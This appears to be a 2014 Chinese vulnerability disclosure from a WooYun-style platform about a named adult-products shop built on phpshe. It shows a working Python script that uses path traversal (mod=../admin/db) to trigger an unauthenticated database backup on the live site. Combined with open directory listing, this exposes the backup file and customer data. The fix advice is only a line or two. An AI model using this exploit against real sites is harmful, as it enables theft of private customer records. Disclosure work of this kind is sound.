2014-04-26:积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-10:厂商已经主动忽略漏洞,细节向公众公开
就是卖成人用品那个,各种信息,然后你懂得
详细说明:首先存在 显示目录列表的问题 可以遍历网站结构
网站系统用的是phpshe 这个在乌云搜了下 可以看到漏洞一大把
而且厂商貌似不是太负责啊
然后根据上面的说名 把 数据库给备份下来了
然后 加上上面的 ‘显示目录列表’问题 就能看到真实的数据备份文件地址
import urllib2
import urllib
url='http://www.majiajia.cc/index.php?mod=../admin/db'
def post(url, data):
req = urllib2.Request(url)
data = urllib.urlencode(data)
#enable cookie
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
response = opener.open(req, data)
return response.read()
data = {'pebackup':'1','backup_where' : "server"}
print post(url, data)
运行上面命令即可备份数据
修复方案:
修改网站配置
另外升级下网站程序吧
未能联系到厂商或者厂商积极拒绝